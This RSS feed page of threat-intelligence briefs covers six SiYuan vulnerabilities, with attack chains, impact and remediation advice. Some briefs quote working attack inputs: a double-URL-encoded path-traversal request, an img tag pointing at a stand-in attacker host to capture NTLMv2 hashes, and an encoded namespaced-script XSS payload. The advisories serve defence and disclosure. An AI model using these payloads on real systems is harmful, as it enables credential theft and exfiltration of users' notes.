https://feed.craftedsignal.io/tags/siyuan/Trending threats, MITRE ATT&CK coverage, and detection metadata — refreshed continuously.Hugoenhello@craftedsignal.iohello@craftedsignal.ioWed, 22 Apr 2026 20:55:31 +0000https://feed.craftedsignal.io/briefs/2026-04-siyuan-path-traversal/Wed, 22 Apr 2026 20:55:31 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-siyuan-path-traversal/SiYuan is vulnerable to path traversal via double URL encoding in the `/export/` endpoint, bypassing an incomplete fix for CVE-2026-30869; an authenticated attacker can exploit this vulnerability to traverse directories and read arbitrary workspace files, including the SQLite database (`siyuan.db`), kernel log, and user documents due to a redundant `url.PathUnescape()` call in `serveExport()`.SiYuan is vulnerable to a path traversal vulnerability (CVE-2026-30869) due to a redundant url.PathUnescape() call within the serveExport() function. The vulnerability exists in versions prior to 3.6.5. This flaw allows an authenticated attacker, including low-privilege users with Publish/Reader roles, to bypass intended security restrictions and access sensitive files stored within the SiYuan workspace. The initial fix attempted with IsSensitivePath() proved insufficient as it did not address the core issue of double URL decoding. An attacker can exploit this vulnerability by using double URL encoded characters in a crafted HTTP request, allowing them to read arbitrary files such as the complete SQLite document database (siyuan.db), kernel logs, and other critical files.

Attack Chain

1. An authenticated attacker sends a GET request to the /export/ endpoint with a double URL encoded path, such as /export/%252e%252e/siyuan.db.
2. The Go HTTP server decodes the initial layer of URL encoding, transforming %25 into %, resulting in a path like /export/%2e%2e/siyuan.db.
3. The path cleaner does not recognize %2e%2e as directory traversal, so it passes through.
4. The serveExport() function then calls url.PathUnescape() on the path, decoding %2e%2e into ...
5. The filepath.Join() function concatenates the exportBaseDir with the now decoded path, e.g., <workspace>/../siyuan.db.
6. The IsSensitivePath() check fails to block the request because it doesn’t account for the decoded path or specific database files in the temp/ directory.
7. The attacker successfully retrieves the contents of the siyuan.db file, which contains the complete document database.
8. The attacker repeats the process to access other sensitive files within the workspace, such as siyuan.log, blocktree.db, and asset_content.db.

Impact

Successful exploitation of this vulnerability allows an attacker to exfiltrate sensitive data, including the entire SQLite document database, potentially containing all user documents, attributes, and search indexes. The attacker can also access the kernel log, which may contain internal server paths, versions, configuration details, and error messages. This information disclosure could lead to further compromise of the system. While the number of victims is unknown, any SiYuan instance running a version prior to 3.6.5 is potentially vulnerable.

Recommendation

• Upgrade SiYuan to version 3.6.5 or later to remediate the vulnerability.
• Deploy the provided Sigma rule Detect SiYuan Path Traversal Attempt to detect attempts to exploit this vulnerability by monitoring for double URL encoded characters in requests to the /export/ endpoint.
• Monitor web server logs for requests to the /export/ endpoint containing %252e%252e to identify potential exploitation attempts.
• Consider implementing a more robust path validation mechanism within the serveExport() function that properly handles URL decoding and directory traversal attempts.

]]>highadvisorypath-traversalweb-applicationsiYuanhttps://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/Sat, 11 Apr 2026 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.SiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with securityLevel: "loose" and htmlLabels: true, which allows <img> tags with src attributes to bypass sanitization and be injected into SVG <foreignObject> blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., //attacker.com/image.png), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim’s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker’s server, exfiltrating the victim’s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.

Attack Chain

1. The attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an <img> tag, such as <img src='//attacker.com/share/img.png'>.
2. The attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).
3. The victim opens the note in SiYuan.
4. SiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.
5. The SVG containing the malicious <img> tag is injected into the DOM via innerHTML.
6. The Electron client attempts to fetch the resource at the protocol-relative URL.
7. On Windows, the protocol-relative URL resolves to a UNC path (\\attacker.com\share\img.png), initiating an SMB connection.
8. Windows automatically sends the victim’s NTLMv2 hash to the attacker’s SMB server, or makes an HTTP request leaking victim’s IP on other platforms.

Impact

The vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim’s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim’s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.

Recommendation

• Deploy the Sigma rule Detect SiYuan Mermaid NTLM Theft Attempt to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).
• Deploy the Sigma rule Detect SiYuan Mermaid SSRF Attempt to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).
• Monitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).
• Block the attacker’s domain (attacker.com) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).
• Upgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.

]]>highadvisorysiyuanntlmssrfcredential-theftmermaidhttps://feed.craftedsignal.io/briefs/2026-04-siyuan-xss/Wed, 01 Apr 2026 00:30:01 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-siyuan-xss/SiYuan Note versions prior to the fix for commit f09953afc57a are vulnerable to reflected cross-site scripting (XSS) via a namespace prefix bypass in the SanitizeSVG function when handling dynamic icons, allowing unauthenticated attackers to execute arbitrary JavaScript in a victim's browser.SiYuan Note, a note-taking application, is susceptible to a reflected XSS vulnerability in its dynamic icon generation functionality. This flaw, present in versions prior to commit f09953afc57a, arises from an insufficient sanitization of SVG content, specifically failing to account for namespace prefixes in SVG elements. The vulnerability resides in the /api/icon/getDynamicIcon endpoint, which is accessible without authentication. An attacker can exploit this by crafting a malicious SVG payload containing namespaced <script> tags (e.g., <x:script xmlns:x="http://www.w3.org/2000/svg">), which bypasses the application’s XSS mitigation measures. Successful exploitation allows arbitrary JavaScript execution within the context of the victim’s SiYuan Note instance, potentially leading to data theft or other malicious activities.

Attack Chain

1. An attacker crafts a malicious URL targeting the /api/icon/getDynamicIcon endpoint with the type=8 parameter.
2. The crafted URL includes a content parameter containing a specially crafted SVG payload. This SVG payload leverages a namespace prefix to bypass the SanitizeSVG function’s intended filtering, e.g., %3C%2Fx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E.
3. The victim, either unknowingly or through social engineering, opens the malicious URL in their browser.
4. The SiYuan server processes the request without proper sanitization, inserting the attacker-controlled content into the SVG, and serves the response with Content-Type: image/svg+xml.
5. The browser’s XML parser interprets the namespace prefix, resolving it to the SVG namespace, and executes the embedded JavaScript code.
6. The JavaScript code executes within the security context of the SiYuan application (http://<siyuan-host>:6806), due to Access-Control-Allow-Origin: *.
7. The attacker’s script can now interact with the SiYuan API using the victim’s session cookies.
8. The attacker can perform actions such as reading notes, exporting data, or modifying settings without authentication.

Impact

This vulnerability poses a significant risk to SiYuan Note users, particularly those whose instances are reachable on a local network. An attacker could potentially compromise sensitive information, manipulate user data, or gain unauthorized access to the application. The ease of exploitation and the absence of authentication requirements make this vulnerability particularly dangerous. Because SiYuan sets Access-Control-Allow-Origin: * and the script runs same-origin, it can call any API endpoint using the victim’s existing session cookies, including endpoints to read all notes, export data, or modify settings.

Recommendation

• Upgrade SiYuan Note to a version that includes the fix for commit f09953afc57a to remediate the vulnerability.
• Deploy the Sigma rule “Detect SiYuan SVG XSS Attempt” to identify potential exploitation attempts in web server logs.
• Monitor web server logs for requests to /api/icon/getDynamicIcon containing SVG payloads with namespace-prefixed script tags, as demonstrated in the PoC.
• Consider implementing a Content Security Policy (CSP) on the SiYuan server to restrict the execution of inline JavaScript.

]]>highadvisoryxsssiyuansvgreflected-xsshttps://feed.craftedsignal.io/briefs/2026-04-siyuan-rce/Tue, 31 Mar 2026 22:17:16 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-04-siyuan-rce/SiYuan versions prior to 3.6.2 are vulnerable to remote code execution (RCE) via a malicious website exploiting a permissive CORS policy to inject a JavaScript snippet, leading to arbitrary code execution within the application's Node.js context.SiYuan is a personal knowledge management system. Versions prior to 3.6.2 contain a critical vulnerability (CVE-2026-34449) that allows a malicious website to execute arbitrary code on any desktop running the application. This is achieved by exploiting an overly permissive Cross-Origin Resource Sharing (CORS) policy (“Access-Control-Allow-Origin: *” combined with “Access-Control-Allow-Private-Network: true”). An attacker can inject a JavaScript snippet into the application via its API. This injected code then executes in the context of Electron’s Node.js environment, granting the attacker full operating system access. The vulnerability is triggered simply by a user visiting a malicious website while SiYuan is running. The issue has been addressed and patched in version 3.6.2 of SiYuan. This RCE can allow attackers to steal data, install malware, or perform other malicious activities on the victim’s machine.

Attack Chain

1. Victim launches the SiYuan application on their desktop (Windows, Linux, or macOS).
2. Victim visits a malicious website in a web browser while SiYuan is running.
3. The malicious website leverages the permissive CORS policy of SiYuan.
4. The malicious website sends an API request to the running SiYuan instance.
5. This API request injects a malicious JavaScript payload into SiYuan.
6. The injected JavaScript code is stored within SiYuan’s data.
7. The next time the user opens SiYuan’s UI, the injected JavaScript code executes within Electron’s Node.js context.
8. The attacker gains full OS access and can perform arbitrary actions.

Impact

Successful exploitation of CVE-2026-34449 allows for complete compromise of the user’s system. The attacker can steal sensitive data, install persistent backdoors, or deploy ransomware. Given SiYuan’s purpose as a knowledge management system, it likely holds valuable and sensitive personal or business information. The impact is significant due to the ease of exploitation requiring no user interaction beyond visiting a malicious website.

Recommendation

• Immediately upgrade SiYuan to version 3.6.2 or later to patch CVE-2026-34449.
• Monitor network connections for unusual API requests originating from web browsers, as this could indicate exploitation attempts. Deploy the Sigma rule title: "Detect Suspicious SiYuan API Access from Web Browser" to detect this behavior.
• Implement strict CORS policies for web applications to prevent unauthorized cross-origin requests.
• Enable process creation logging and monitor for unexpected processes spawned from SiYuan, as this could be a sign of successful RCE. Deploy the Sigma rule title: "Detect Processes Spawned from SiYuan Indicating RCE" to detect this.

]]>criticaladvisorycve-2026-34449rcesiyuancorshttps://feed.craftedsignal.io/briefs/2026-03-siyuan-traversal/Thu, 26 Mar 2026 12:00:00 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-03-siyuan-traversal/SiYuan note taking application is vulnerable to a directory traversal via the /api/file/readDir endpoint, which does not require authentication, allowing an attacker to enumerate the directory structure and retrieve file names, potentially leading to arbitrary document reading.The SiYuan note-taking application is susceptible to a critical directory traversal vulnerability affecting versions up to 0.0.0-20260317012524-fe4523fff2c8. The vulnerability resides in the /api/file/readDir endpoint, which lacks authentication. This allows unauthenticated attackers to send POST requests to enumerate directories and retrieve file names within the application’s data and configuration directories. Successful exploitation allows a malicious actor to gain sensitive information about the application’s file structure, and could be chained with a file-reading vulnerability to achieve arbitrary document access. This poses a significant risk to confidentiality and data security.

Attack Chain

1. An attacker identifies a vulnerable SiYuan instance.
2. The attacker sends an unauthenticated POST request to the /api/file/readDir endpoint.
3. The POST request includes a path parameter specifying the directory to list, such as data or conf.
4. The SiYuan application processes the request without authentication and returns a JSON response containing a list of files and directories within the specified path.
5. The attacker parses the JSON response to identify interesting files and directories.
6. The attacker repeats steps 2-5 to traverse deeper into the directory structure.
7. The attacker identifies the location of sensitive documents or configuration files.
8. The attacker leverages a separate file reading vulnerability (not detailed in this brief) to access and exfiltrate the identified documents or configuration files, gaining unauthorized access to sensitive information.

Impact

Successful exploitation of this directory traversal vulnerability allows an attacker to enumerate the entire directory structure of a SiYuan notebook. This may expose sensitive information stored within the application’s data and configuration files. When combined with a file reading vulnerability, attackers can access and exfiltrate arbitrary documents, potentially leading to data breaches and confidentiality compromise. The number of affected users is potentially large, given the popularity of the SiYuan note-taking application. Targeted sectors would include any organization or individual using SiYuan for storing sensitive information.

Recommendation

• Apply updates to SiYuan to versions greater than 0.0.0-20260317012524-fe4523fff2c8 that patch CVE-2026-33670.
• Monitor web server logs for POST requests to the /api/file/readDir endpoint, as detailed in the rule below, and investigate unexpected activity.
• Deploy the Sigma rule provided to detect exploitation attempts in web server logs, tuning it for your environment.
• Block access from IP address 172.18.40.184 observed in the exploit PoC, if seen connecting to your SiYuan instances.

]]>criticaladvisorydirectory-traversalsiyuancve-2026-33670https://feed.craftedsignal.io/briefs/2026-06-siyuan-arbitrary-doc-read/Wed, 25 Mar 2026 19:37:18 +0000hello@craftedsignal.iohttps://feed.craftedsignal.io/briefs/2026-06-siyuan-arbitrary-doc-read/SiYuan is vulnerable to arbitrary document reading via the publishing service, allowing attackers to retrieve document IDs and view the content of all documents, including encrypted or prohibited ones, by exploiting the `/api/file/readDir` and `/api/block/getChildBlocks` interfaces.SiYuan, a note-taking application, is susceptible to an arbitrary document reading vulnerability within its publishing service. This flaw allows an unauthenticated attacker to bypass access controls and retrieve the content of any document, regardless of encryption or access restrictions. The vulnerability stems from inadequate authorization checks when accessing document content through specific API endpoints. The issue was reported on March 25, 2026, and is tracked as CVE-2026-33669. The vulnerable package is go/github.com/siyuan-note/siyuan/kernel, specifically versions equal to or older than 0.0.0-20260317012524-fe4523fff2c8. This vulnerability poses a significant risk to organizations and individuals using SiYuan for sensitive data storage, potentially leading to unauthorized access and data breaches.

Attack Chain

1. The attacker identifies a SiYuan instance with the publishing service enabled.
2. The attacker sends a request to the /api/file/readDir endpoint to retrieve a list of document IDs. This endpoint lacks proper authorization checks.
3. The SiYuan server responds with a list of document IDs available within the publishing service.
4. The attacker selects a target document ID from the list obtained in the previous step.
5. The attacker sends a POST request to the /api/block/getChildBlocks endpoint, providing the target document ID in the request body. This endpoint is intended to retrieve child blocks of a specific document.
6. Due to insufficient access control, the server processes the request and returns the content of the requested document, even if it is encrypted or restricted.
7. The attacker parses the JSON response to extract the document content, which is typically formatted in Markdown.
8. The attacker can repeat steps 4-7 to obtain the content of other documents.

Impact

The arbitrary document reading vulnerability allows unauthorized access to potentially sensitive information stored within SiYuan. Successful exploitation could lead to the disclosure of confidential documents, intellectual property, personal data, or other restricted content. The impact is significant, as it bypasses intended security measures such as encryption and access controls. While specific victim numbers are unknown, any organization or individual utilizing the affected SiYuan version with the publishing service enabled is potentially at risk. The CVE is rated critical.

Recommendation

• Upgrade SiYuan to a patched version that addresses CVE-2026-33669.
• Deploy the Sigma rule “SiYuan Arbitrary Document Access via getChildBlocks” to detect potential exploitation attempts targeting the /api/block/getChildBlocks endpoint in your web server logs.
• Monitor web server logs for suspicious activity, specifically POST requests to /api/block/getChildBlocks with unusual document IDs or request patterns.
• Implement rate limiting on the /api/file/readDir and /api/block/getChildBlocks endpoints to mitigate potential abuse.
• Enable webserver logging and ensure all SiYuan instances are monitored by the logging solution.

]]>criticaladvisorysiyuanarbitrary-document-accessvulnerabilitywebserver